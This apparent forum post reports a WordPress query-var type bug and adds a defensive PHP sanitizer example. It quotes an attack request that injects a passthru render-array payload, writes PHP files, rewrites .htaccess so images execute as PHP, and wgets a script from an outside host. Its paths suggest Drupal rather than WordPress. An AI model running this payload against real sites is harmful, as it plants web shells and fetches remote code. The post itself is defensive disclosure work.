I ran into this today. It’s a bug. I filed a bug report here:
https://core.trac.wordpress.org/ticket/46797
The problem is this line of code:
$qv['name'] = trim( $qv['name'] );
A (malicious) user sends a request that looks like:
GET /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo ‘Vuln!! patch it Now!’ > vuln.htm; echo ‘Vuln!!’> sites/default/files/vuln.php; echo ‘Vuln!!’> vuln.php; cd sites/default/files/; echo ‘AddType application/x-httpd-php .jpg’ > .htaccess; wget ‘http://40k.waszmann.de/Deutsch/images/up.php‘
Such a request makes $qv['name'] an array, not a string.
Needs to be sanitized.
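To make the failure concrete from a defender's side, here is an added PHP example (not from the ticket and not WordPress core code). It uses PHP's own parse_str() to mimic how $_GET is populated, so you can see that bracket syntax in a query string turns a value into an array, and it shows a sanitizer that drops non-scalar query vars before trim() ever sees them. The function names, the optional hook on WordPress's `request` filter, and the sample query strings are all assumptions constructed for this example.

```php
<?php
// Added example, not part of the ticket or of WordPress core.
// Demonstrates the defect class: a query var that is assumed to be a
// string but arrives as an array, and a guard that rejects it.

/**
 * Parse a raw query string the way PHP populates $_GET, so that the type
 * of each value (string vs. nested array) can be inspected.
 */
function parse_query_vars(string $query_string): array
{
    $qv = [];
    parse_str($query_string, $qv);
    return $qv;
}

/**
 * Return a trimmed string for a query var, or an empty string when the
 * value is absent or not a scalar. Arrays are dropped rather than cast:
 * (string) on an array only yields "Array" and a warning, and trim() on an
 * array is a warning on PHP 7 and a TypeError on PHP 8.
 */
function sanitize_string_query_var(array $qv, string $key): string
{
    if (!array_key_exists($key, $qv)) {
        return '';
    }
    $value = $qv[$key];
    if (!is_scalar($value)) {
        // Arrays and objects are never valid for a slug-like var; treat as absent.
        return '';
    }
    return trim((string) $value);
}

/**
 * Apply the guard to every key that the caller declares must be a string.
 * Keys not listed are passed through untouched.
 */
function sanitize_string_query_vars(array $qv, array $string_keys): array
{
    foreach ($string_keys as $key) {
        if (array_key_exists($key, $qv)) {
            $qv[$key] = sanitize_string_query_var($qv, $key);
        }
    }
    return $qv;
}

// Constructed sample inputs: a normal request, and one that injects array
// syntax into the same parameter.
$normal  = parse_query_vars('name=hello-world%20');
$arrayed = parse_query_vars('name[]=hello&name[]=world');

var_dump(is_string($normal['name']));
var_dump(is_array($arrayed['name']));

// Unguarded use of the arrayed value would be: trim($arrayed['name']);
// That is the call the ticket points at. With the guard:
var_dump(sanitize_string_query_var($normal, 'name'));
var_dump(sanitize_string_query_var($arrayed, 'name'));

// Hypothetical placement inside WordPress: WP::parse_request() passes its
// query vars through the 'request' filter, which is early enough to
// normalise types before the rest of the query machinery uses them.
// Guarded so this file also runs outside WordPress.
if (function_exists('add_filter')) {
    add_filter('request', function (array $qv): array {
        return sanitize_string_query_vars($qv, ['name', 'pagename', 's']);
    });
}
```

Run it with `php example.php` to see the two var_dump() type checks and the sanitized results. The design choice worth noting is that the guard returns an empty string instead of casting: a cast would silently produce the literal "Array", which is a valid-looking slug and would mask the bad input rather than reject it.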